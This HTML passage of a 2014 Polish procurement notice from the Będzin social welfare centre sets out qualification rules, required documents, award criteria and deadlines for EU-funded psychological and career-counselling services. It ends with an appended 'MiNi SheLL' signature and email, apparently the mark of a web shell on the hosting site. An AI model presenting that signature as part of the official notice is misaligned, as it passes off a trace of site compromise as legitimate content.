te zostały wykonane oraz załączy dowody potwierdzające, czy każda z tych usług została wykonana lub w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych 
jest wykonywana należycie, zamieszczając przedmiotowe informacje w Wykazie wykonanych, a w przypadku świadczeń okresowych lub ciągłych - również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie stanowiącym załącznik 
nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku dysponowania odpowiednim potencjałem technicznym, jeśli Wykonawca ten oświadczy, że dysponuje odpowiednim 
do wykonania zamówienia potencjałem technicznym, składając oświadczenie według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku dysponowania osobami zdolnymi do wykonania zamówienia jeśli Wykonawca ten na czas realizacji zamówienia będzie dysponował odpowiednio:
­	   co najmniej 5 wykładowcami/trenerami/terapeutami zdolnymi 
do wykonania modułu 1, modułu 2 i modułu 4 przedmiotu zamówienia określonych w Rozdziale II ust. 4 pkt 1, 2 i 4  SIWZ, przy czym każda z tych osób:
-   posiada wykształcenie wyższe psychologiczne (ukończone studia wyższe w rozumieniu przepisów ustawy z dnia 27 lipca 2005 roku Prawo 
o szkolnictwie wyższym - /tekst jednolity: Dz. U. z 2012 r., 
poz. 572 ze zm./  na kierunku  psychologia) - przedmiotową informację należy zamieścić w pozycji kwalifikacje zawodowe i wykształcenie niezbędne do wykonania zamówienia w formularzu Wykaz osób, 
które będą uczestniczyć w wykonaniu zamówienia stanowiącym załącznik nr 6 do SIWZ;
-    posiada doświadczenie w pracy z beneficjentami projektów pomocowych skierowanych do grup społecznych zagrożonych wykluczeniem - przedmiotową informację należy zamieścić w pozycji - udokumentowane doświadczenie w pracy z beneficjentami projektów pomocowych skierowanych do grup społecznych zagrożonych wykluczeniem,   
w formularzu Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącym załącznik nr 6 do SIWZ;
-    legitymuje się przeprowadzeniem w ciągu ostatnich 3 lat/*przed upływem terminu składania ofert co najmniej 500 godzin zajęć obejmujących swoim rodzajem grupowe wsparcie psychologiczno - terapeutyczne 
i/lub warsztaty arteterapii i/lub indywidualne wsparcie psychologiczne - przedmiotową informację należy zamieścić w pozycji - doświadczenie zawodowe związane z przedmiotem zamówienia w formularzu Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącym załącznik nr 6 do SIWZ;
­	   co najmniej 2 wykładowcami/trenerami/terapeutami zdolnymi 
do wykonania modułu 3 przedmiotu zamówienia określonego w Rozdziale II ust. 4 pkt 3 SIWZ, przy czym każda z tych osób:
-  posiada wykształcenie wyższe w rozumieniu przepisów ustawy z dnia 
27 lipca 2005 roku Prawo o szkolnictwie wyższym - /tekst jednolity: 
Dz. U. z 2012 r., poz. 572 ze zm./ - przedmiotową informację należy zamieścić w pozycji kwalifikacje zawodowe i wykształcenie niezbędne 
do wykonania zamówienia w formularzu Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącym załącznik nr 6 
do SIWZ;
-    posiada co najmniej roczny staż w zakresie poradnictwa zawodowego - przedmiotową informację należy zamieścić w pozycji  udokumentowany co najmniej roczny staż pracy w zakresie poradnictwa zawodowego
w formularzu Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącym załącznik nr 6 do SIWZ;
-  posiada dodatkowe kwalifikacje (kursy, szkolenia, itp.) w zakresie narzędzi i metod wykorzystywanych w trakcie realizacji przedmiotu niniejszego zamówienia i/lub zagadnień składających się na realizację przedmiotu niniejszego zamówienia - przedmiotową informację należy zamieścić w pozycji kwalifikacje zawodowe i wykształcenie niezbędne
 do wykonania zamówienia w formularzu Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącym załącznik nr 6 
do SIWZ;
-    posiada doświadczenie w pracy z beneficjentami projektów pomocowych skierowanych do grup społecznych zagrożonych wykluczeniem - przedmiotową informację należy zamieścić w pozycji - udokumentowane doświadczenie w pracy z beneficjentami projektów pomocowych skierowanych do grup społecznych zagrożonych wykluczeniem
w formularzu Wykaz osób, które będą SIWZ;
-    legitymuje się przeprowadzeniem w ciągu ostatnich 3 lat/*przed upływem terminu składania ofert co najmniej 200 godzin zajęć obejmujących swoim rodzajem indywidualne doradztwo (poradnictwo) zawodowe - przedmiotową informację należy zamieścić w pozycji - doświadczenie zawodowe związane z przedmiotem zamówienia w formularzu Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącym załącznik nr 6 do SIWZ -
co wykaże w formularzu - Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącym załącznik nr 6 do SIWZ, wypełniając wszystkie jego pozycje, w tym również dotyczące informacji o podstawie do dysponowania osobami, które będą uczestniczyć 
w wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku znajdowania się w odpowiedniej sytuacji ekonomicznej i finansowej, jeżeli ten oświadczy, że znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, składając oświadczenie według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">opis sposobu organizacji opieki nad dziećmi do 7 roku życia, zawierający informacje określone w Rozdziale II ust. 11 SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz oferty (wzór formularza stanowi załącznik nr 1 do SIWZ);
2) pełnomocnictwo do reprezentowania Wykonawcy, o którym mowa w Rozdziale IX ust. 5 SIWZ, o ile ofertę składa pełnomocnik.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie Wykonawcy w realizacji przedmiotowego zamówienia - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej umowy, 
w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, 
zgodnie z warunkami podanymi we wzorze umowy, stanowiącym załącznik nr 7 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bedzin.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego, to jest w Miejskim Ośrodku Pomocy Społecznej w Będzinie, kod pocztowy: 42-500, przy ul. 11-go Listopada 1, w sekretariacie - pokój numer 47..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2014 godzina 10:00, miejsce: W siedzibie Zamawiającego, to jest w Miejskim Ośrodku Pomocy Społecznej w Będzinie, kod pocztowy: 42-500, przy ul. 11-go Listopada 1, w sekretariacie - pokój numer 40.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Legalniezmotywowani.pl jest współfinansowany ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com